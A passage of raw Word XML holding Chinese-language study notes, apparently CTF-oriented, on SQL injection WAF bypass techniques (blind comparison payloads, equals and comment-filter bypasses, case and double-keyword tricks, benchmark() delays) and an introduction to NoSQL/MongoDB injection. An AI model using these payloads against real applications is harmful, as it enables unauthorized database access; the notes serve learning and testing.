      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694019">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>select * from users where id=1 and ascii(substr(database(),0,1))&gt;64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC2FBAF" w14:textId="52D7D99F" w:rsidR="00694019" w:rsidRPr="00694019" w:rsidRDefault="00694019" w:rsidP="00935AB6">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694019">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA25E2C" w14:textId="5317DA98" w:rsidR="00410019" w:rsidRDefault="00410019" w:rsidP="00694019">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00410019">
        <w:t>least(n1,n2,n3</w:t>
      </w:r>
      <w:r>
        <w:t>,......</w:t>
      </w:r>
      <w:r w:rsidRPr="00410019">
        <w:t>):返回最小值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE9D59A" w14:textId="77777777" w:rsidR="009616DA" w:rsidRDefault="009616DA" w:rsidP="00694019">
      <w:r w:rsidRPr="009616DA">
        <w:t>strcmp(str1,str2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5529DB60" w14:textId="14B43FBA" w:rsidR="009616DA" w:rsidRDefault="009616DA" w:rsidP="00694019">
      <w:r w:rsidRPr="009616DA">
        <w:t>若所有的字符串均相同，则返回STRCMP()，若根据当前分类次序，第一个参数小于第二个，则返回 -1，其它情况返回 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FD80AF" w14:textId="55F553C8" w:rsidR="009616DA" w:rsidRDefault="009616DA" w:rsidP="00694019">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009616DA">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>select * from users where id = 1 and strcmp(ascii(substr(username,1,1)),117);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9C093B" w14:textId="3BA5350A" w:rsidR="009616DA" w:rsidRDefault="009616DA" w:rsidP="00694019">
      <w:r w:rsidRPr="009616DA">
        <w:t>between a and b:范围在a-b之间</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF09FA4" w14:textId="2FA21D95" w:rsidR="009616DA" w:rsidRPr="009616DA" w:rsidRDefault="009616DA" w:rsidP="00694019">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009616DA">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>select * from users where id between 1 and 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E342EF" w14:textId="4B122776" w:rsidR="009616DA" w:rsidRPr="009616DA" w:rsidRDefault="009616DA" w:rsidP="00694019">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009616DA">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>select * from users where id = 1 and substr(username,1,1) between 't' and 't';</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断相等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471FEF06" w14:textId="4B104E8D" w:rsidR="001B7E8D" w:rsidRDefault="009B7CBB" w:rsidP="00694019">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等号绕过：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9D13AB" w14:textId="2FB17D48" w:rsidR="009B7CBB" w:rsidRDefault="009B7CBB" w:rsidP="00694019">
      <w:r w:rsidRPr="009B7CBB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不加通配符的</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7CBB">
        <w:t>like执行的效果和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B7CBB">
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B7CBB">
        <w:t>一致，所以可以用来绕过。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7567ED7C" w14:textId="1A91B6FB" w:rsidR="009B7CBB" w:rsidRDefault="00FD7C8A" w:rsidP="00FD7C8A">
      <w:r>
        <w:t>rlike</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>模糊匹配，只要字段的值中存在要查找的部分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>就会被选择出来，rlike的用法和上面的like一样，没有通配符效果和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相同</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204BBB67" w14:textId="77777777" w:rsidR="00A20AF2" w:rsidRDefault="00A20AF2" w:rsidP="00FD7C8A">
      <w:r w:rsidRPr="00A20AF2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>使用大小于号来绕过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632574BA" w14:textId="2F21980A" w:rsidR="00A20AF2" w:rsidRDefault="00A20AF2" w:rsidP="00FD7C8A">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A20AF2">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>select * from users where id &gt; 1 and id &lt; 3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B96374C" w14:textId="77777777" w:rsidR="001B7E8D" w:rsidRPr="001B7E8D" w:rsidRDefault="001B7E8D" w:rsidP="001B7E8D">
      <w:r w:rsidRPr="001B7E8D">
        <w:t>&lt;&gt; 等价于 !=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D28FD3" w14:textId="0E0F9DDD" w:rsidR="001B7E8D" w:rsidRPr="005B596C" w:rsidRDefault="001B7E8D" w:rsidP="005B596C">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA110C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以在前面再加一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA110C">
        <w:t>!结果就是等号了</w:t>
      </w:r>
      <w:r w:rsidR="00C3634C" w:rsidRPr="005B596C">
        <w:t>，即</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A915798" w14:textId="03E00A38" w:rsidR="0017725D" w:rsidRDefault="00C3634C" w:rsidP="00694019">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C3634C">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>select * from users where !(id &lt;&gt; 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096BB3DE" w14:textId="44F4AD28" w:rsidR="009616DA" w:rsidRDefault="009616DA" w:rsidP="00694019"/>
    <w:p w14:paraId="79A3B4D0" w14:textId="185C953D" w:rsidR="009616DA" w:rsidRDefault="009616DA" w:rsidP="00694019"/>
    <w:p w14:paraId="32D5FA6F" w14:textId="77777777" w:rsidR="009616DA" w:rsidRDefault="009616DA" w:rsidP="00694019"/>
    <w:p w14:paraId="1150D5BB" w14:textId="615EB5A7" w:rsidR="00694019" w:rsidRDefault="00694019" w:rsidP="00694019">
      <w:r>
        <w:t>5.or and 绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFBEC36" w14:textId="77777777" w:rsidR="009B7CBB" w:rsidRDefault="009B7CBB" w:rsidP="009B7CBB">
      <w:r>
        <w:t>and = &amp;&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA1A9DC" w14:textId="77777777" w:rsidR="009B7CBB" w:rsidRDefault="009B7CBB" w:rsidP="009B7CBB">
      <w:r>
        <w:t>or = ||</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFE3962" w14:textId="77777777" w:rsidR="009B7CBB" w:rsidRDefault="009B7CBB" w:rsidP="009B7CBB">
      <w:r>
        <w:t>xor = | # 异或</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72149C81" w14:textId="1BC4EAD0" w:rsidR="009B7CBB" w:rsidRDefault="009B7CBB" w:rsidP="009B7CBB">
      <w:r>
        <w:t>not = !</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2195CCF3" w14:textId="33F8FD27" w:rsidR="00694019" w:rsidRDefault="00694019" w:rsidP="009B7CBB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00694019">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过注释符号</w:t>
      </w:r>
      <w:r>
        <w:t>(#，--)过滤：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72687D2F" w14:textId="1A9DDDC5" w:rsidR="00694019" w:rsidRDefault="00694019" w:rsidP="00694019">
      <w:r>
        <w:t>id=1'union select 1,2,3||'1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269C763C" w14:textId="35519AC5" w:rsidR="00694019" w:rsidRDefault="00694019" w:rsidP="00694019">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后的</w:t>
      </w:r>
      <w:r>
        <w:t>or '1闭合查询语句的最后的单引号，或者：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0620C43F" w14:textId="5B709AE3" w:rsidR="00694019" w:rsidRDefault="00694019" w:rsidP="00694019">
      <w:r>
        <w:t>id=1'union select 1,2,'3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E14FAAA" w14:textId="0A8F436F" w:rsidR="009B7CBB" w:rsidRDefault="009B7CBB" w:rsidP="009B7CBB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大小写绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E157CD" w14:textId="77777777" w:rsidR="009B7CBB" w:rsidRDefault="009B7CBB" w:rsidP="009B7CBB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常用于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> waf的正则对大小写不敏感的情况，一般都是题目自己故意这样设计。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779B3D13" w14:textId="0C739386" w:rsidR="00694019" w:rsidRDefault="009B7CBB" w:rsidP="009B7CBB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如：</w:t>
      </w:r>
      <w:r>
        <w:t>waf过滤了关键字select，可以尝试使用Select等绕过。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EF38AC" w14:textId="386AAA2A" w:rsidR="009B7CBB" w:rsidRPr="00694019" w:rsidRDefault="009B7CBB" w:rsidP="009B7CBB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>双写关键字绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8EFE7B" w14:textId="3ED5AB3E" w:rsidR="00935AB6" w:rsidRDefault="009B7CBB" w:rsidP="00935AB6">
      <w:r w:rsidRPr="009B7CBB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在某一些简单的</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7CBB">
        <w:t>waf中，将关键字select等只使用replace()函数置换为空，这时候可以使用双写关键字绕过。例如select变成seleselectct，经过waf的处理后变成select，达到绕过的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目的</w:t>
      </w:r>
      <w:r w:rsidRPr="009B7CBB">
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DBC157" w14:textId="6EEC6ECA" w:rsidR="001A29DE" w:rsidRDefault="00726283" w:rsidP="001A29DE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00726283">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过滤函数绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F63269A" w14:textId="39A2D674" w:rsidR="00726283" w:rsidRDefault="00726283" w:rsidP="001A29DE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00726283">
        <w:t xml:space="preserve"> sleep() --&gt;benchmark()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A52235" w14:textId="353C692A" w:rsidR="00726283" w:rsidRDefault="00726283" w:rsidP="001A29DE">
      <w:r w:rsidRPr="00726283">
        <w:t>BENCHMARK()函数可以测试某些特定操作的执行速度</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00726283">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一个参数是执行次数，第二个执行的表达式</w:t>
      </w:r>
      <w:r w:rsidR="00C679E7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB3473F" w14:textId="30861103" w:rsidR="00C679E7" w:rsidRPr="00C679E7" w:rsidRDefault="00C679E7" w:rsidP="001A29DE">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C679E7">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>select benchmark(5000000, md5( 'test' ));</w:t>
      </w:r>
      <w:r w:rsidRPr="00C679E7">
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>​</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:ascii="MS Gothic" w:eastAsiaTheme="minorEastAsia" w:hAnsi="MS Gothic" w:cs="MS Gothic"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:ascii="MS Gothic" w:eastAsiaTheme="minorEastAsia" w:hAnsi="MS Gothic" w:cs="MS Gothic"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:ascii="MS Gothic" w:eastAsiaTheme="minorEastAsia" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:ascii="MS Gothic" w:eastAsiaTheme="minorEastAsia" w:hAnsi="MS Gothic" w:cs="MS Gothic"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:rFonts w:ascii="MS Gothic" w:eastAsiaTheme="minorEastAsia" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于延时</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ED2D59" w14:textId="0FC05C4C" w:rsidR="00C679E7" w:rsidRDefault="00C679E7" w:rsidP="00C679E7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C679E7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ascii()–&gt;hex()、bin()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06569418" w14:textId="5437DE98" w:rsidR="001A29DE" w:rsidRDefault="00C679E7" w:rsidP="00C679E7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>替代之后再使用对应的进制转</w:t>
      </w:r>
      <w:r>
        <w:t>string即可</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E634EC6" w14:textId="68E4DF2C" w:rsidR="00C679E7" w:rsidRDefault="00C679E7" w:rsidP="00C679E7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C679E7">
        <w:t xml:space="preserve"> group_concat()–&gt;concat_ws()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8E4A7D" w14:textId="64417764" w:rsidR="00C679E7" w:rsidRPr="00C679E7" w:rsidRDefault="00C679E7" w:rsidP="00C679E7">
      <w:r w:rsidRPr="00C679E7">
        <w:t>CONCAT_WS(separator,input_string1,input_string2,[...input_stringN]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5289E1" w14:textId="7B16DCDA" w:rsidR="00C679E7" w:rsidRPr="00C679E7" w:rsidRDefault="00046E72" w:rsidP="00C679E7">
      <w:r w:rsidRPr="00046E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数将输入字符串连接成一个字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00046E72">
        <w:t>它将这些连接的字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidRPr="00046E72">
        <w:t>第一个参数中指定的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>符号分隔</w:t>
      </w:r>
      <w:r w:rsidRPr="00046E72">
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB93EEE" w14:textId="3F0B649B" w:rsidR="00C679E7" w:rsidRDefault="00C679E7" w:rsidP="00C679E7">
      <w:r w:rsidRPr="00C679E7">
        <w:t>select group_concat("str1","str2");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331F5C29" w14:textId="06D4BE95" w:rsidR="00C679E7" w:rsidRDefault="00C679E7" w:rsidP="00C679E7">
      <w:r w:rsidRPr="00C679E7">
        <w:t>select concat_ws(",","str1","str2");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA02150" w14:textId="2F9E2FBB" w:rsidR="009320D3" w:rsidRDefault="00A27DE7" w:rsidP="00C679E7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8673D1" w14:textId="56E7D969" w:rsidR="009320D3" w:rsidRDefault="009320D3" w:rsidP="00C679E7">
      <w:r w:rsidRPr="009320D3">
        <w:t>substr(),substring(),mid()可以相互取代, 取子串的函数还有left(),right()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178C7C98" w14:textId="502EC0DA" w:rsidR="009320D3" w:rsidRDefault="009320D3" w:rsidP="00C679E7">
      <w:r w:rsidRPr="009320D3">
        <w:t>user() --&gt; @@user、datadir–&gt;@@datadir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA94556" w14:textId="7C104D86" w:rsidR="009320D3" w:rsidRDefault="009320D3" w:rsidP="00C679E7">
      <w:r w:rsidRPr="009320D3">
        <w:t>ord()–&gt;ascii():这两个函数在处理英文时效果一样，但是处理中文等时不一致。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187B033F" w14:textId="51595486" w:rsidR="00CB0C16" w:rsidRPr="009B2B46" w:rsidRDefault="00CB0C16" w:rsidP="00CB0C16">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0C16">
        <w:lastRenderedPageBreak/>
        <w:t>NoSQL注入</w:t>
      </w:r>
      <w:r w:rsidR="009B2B46">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009B2B46">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009B2B46" w:rsidRPr="009B2B46">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Not Only SQL</w:t>
      </w:r>
      <w:r w:rsidR="009F18FF">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009F18FF">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009F18FF" w:rsidRPr="009F18FF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>接触甚少</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE3EC93" w14:textId="77777777" w:rsidR="00CB0C16" w:rsidRDefault="00CB0C16" w:rsidP="00CB0C16">
      <w:r>
        <w:t>NoSQL数据库提供比传统SQL数据库更宽松的一致性限制。 通过减少关系约束和一致性检查，NoSQL数据库提供了更好的性能和扩展性。 然而，即使这些数据库没有使用传统的SQL语法，它们仍然可能很容易的受到注入攻击。 由于这些NoSQL注入攻击可以在程序语言中执行，而不是在声明式 SQL语言中执行，所以潜在影响要大于传统SQL注入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0344D77B" w14:textId="516608B2" w:rsidR="00CB0C16" w:rsidRDefault="00CB0C16" w:rsidP="00CB0C16">
      <w:r>
        <w:t>NoSQL数据库的调用是使用应用程序的编程语言编写的，过滤掉常见的HTML特殊字符，如&lt;&gt;＆;不会阻止针对NoSQL的攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105C14EC" w14:textId="0FDFC025" w:rsidR="009B2B46" w:rsidRDefault="009B2B46" w:rsidP="009B2B46">
      <w:r>
        <w:t>MongoDB 是当前最流行的 NoSQL 数据库产品之一，由 C++ 语言编写，是一个基于分布式文件存储的数据库。旨在为 WEB 应用提供可扩展的高性能数据存储解决方案。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52688222" w14:textId="379B66D2" w:rsidR="009B2B46" w:rsidRDefault="009B2B46" w:rsidP="009B2B46">
      <w:r>
        <w:t>MongoDB 将数据存储为一个文档，数据结构由键值（key=&gt;value）对组成。MongoDB 文档类似于 JSON 对象。字段值可以包含其他文档，数组及文档数组。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7"/>
        <w:gridCol w:w="1276"/>
        <w:gridCol w:w="3544"/>
      </w:tblGrid>
      <w:tr w:rsidR="006832A2" w14:paraId="1527114B" w14:textId="1DBA41D9" w:rsidTr="006832A2">
        <w:trPr>
          <w:trHeight w:val="321"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1127" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14337548" w14:textId="6926B4FA" w:rsidR="006832A2" w:rsidRDefault="006832A2" w:rsidP="006832A2">
            <w:pPr>
              <w:ind w:left="-7"/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database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71E26F60" w14:textId="77AA6C3E" w:rsidR="006832A2" w:rsidRDefault="006832A2" w:rsidP="006832A2">
            <w:pPr>
              <w:ind w:left="139"/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database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D7CF6A7" w14:textId="77777777" w:rsidR="006832A2" w:rsidRDefault="006832A2" w:rsidP="006832A2">
            <w:pPr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数据库</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006832A2" w14:paraId="2D0589B4" w14:textId="571DBE61" w:rsidTr="006832A2">
        <w:trPr>
          <w:trHeight w:val="321"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1127" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="538EEC21" w14:textId="555D4F98" w:rsidR="006832A2" w:rsidRPr="00AF4CCF" w:rsidRDefault="006832A2" w:rsidP="006832A2">
            <w:pPr>
              <w:ind w:left="-7"/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table</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A1B3DD4" w14:textId="72C9B33E" w:rsidR="006832A2" w:rsidRPr="00AF4CCF" w:rsidRDefault="006832A2" w:rsidP="006832A2">
            <w:pPr>
              <w:ind w:left="139"/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collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B1D809B" w14:textId="77777777" w:rsidR="006832A2" w:rsidRPr="00AF4CCF" w:rsidRDefault="006832A2" w:rsidP="006832A2">
            <w:pPr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数据库表/集合</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006832A2" w14:paraId="087CBCBE" w14:textId="3F5A4542" w:rsidTr="006832A2">
        <w:trPr>
          <w:trHeight w:val="321"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1127" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49C793C5" w14:textId="51D5D141" w:rsidR="006832A2" w:rsidRPr="00AF4CCF" w:rsidRDefault="006832A2" w:rsidP="006832A2">
            <w:pPr>
              <w:ind w:left="-7"/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row</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="546D540D" w14:textId="18C1D6B6" w:rsidR="006832A2" w:rsidRPr="00AF4CCF" w:rsidRDefault="006832A2" w:rsidP="006832A2">
            <w:pPr>
              <w:ind w:left="139"/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document</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
